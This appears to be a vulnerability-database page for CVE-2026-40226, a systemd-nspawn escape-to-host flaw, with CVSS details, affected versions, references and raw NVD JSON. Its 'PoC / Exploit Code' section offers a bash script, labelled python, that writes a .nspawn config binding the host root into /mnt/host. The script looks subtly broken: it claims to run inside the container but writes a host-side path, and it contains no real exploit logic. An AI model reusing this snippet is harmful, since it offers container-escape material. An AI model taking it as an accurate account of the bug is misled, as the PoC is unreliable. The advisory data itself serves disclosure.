CVE-2026-40226

Description

In nspawn in systemd 233 through 259 before 260, an escape-to-host action can occur via a crafted optional config file.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:* - VULNERABLE

systemd 233 - 259

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC for CVE-2026-40226: systemd-nspawn Container Escape
# This script demonstrates a crafted config file scenario.
# Requirement: High privileges (root) inside the container.

CONFIG_FILE="/etc/systemd/nspawn/container.nspawn"

# Create a malicious configuration file
# Exploiting the optional config file handling to bind mount host root
echo "[Files]" > $CONFIG_FILE
echo "Bind=/:/mnt/host" >> $CONFIG_FILE

echo "Malicious config created at $CONFIG_FILE"
echo "Exploit attempts to bind mount host root to /mnt/host"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40226
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40226
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40226/
[4] VulDB https://vuldb.com/cve/CVE-2026-40226
[5] https://github.com/systemd/systemd/security/advisories/GHSA-9mj4-rrc3-gjcx

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40226", "sourceIdentifier": "[email protected]", "published": "2026-04-10T16:16:33.447", "lastModified": "2026-04-17T22:02:15.393", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In nspawn in systemd 233 through 259 before 260, an escape-to-host action can occur via a crafted optional config file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-348"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:*", "versionStartIncluding": "233", "versionEndExcluding": "257.12", "matchCriteriaId": "29AAD5A6-4198-4D58-9FBB-FE35AFADA909"}, {"vulnerable": true, "criteria": "cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:*", "versionStartIncluding": "258", "versionEndExcluding": "258.6", "matchCriteriaId": "CDEB656F-DF55-418A-A250-E414B7DFF975"}, {"vulnerable": true, "criteria": "cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:*", "versionStartIncluding": "259", "versionEndExcluding": "259.4", "matchCriteriaId": "2D35ABE2-6825-4820-96FA-37601DA85848"}]}]}], "references": [{"url": "https://github.com/systemd/systemd/security/advisories/GHSA-9mj4-rrc3-gjcx", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}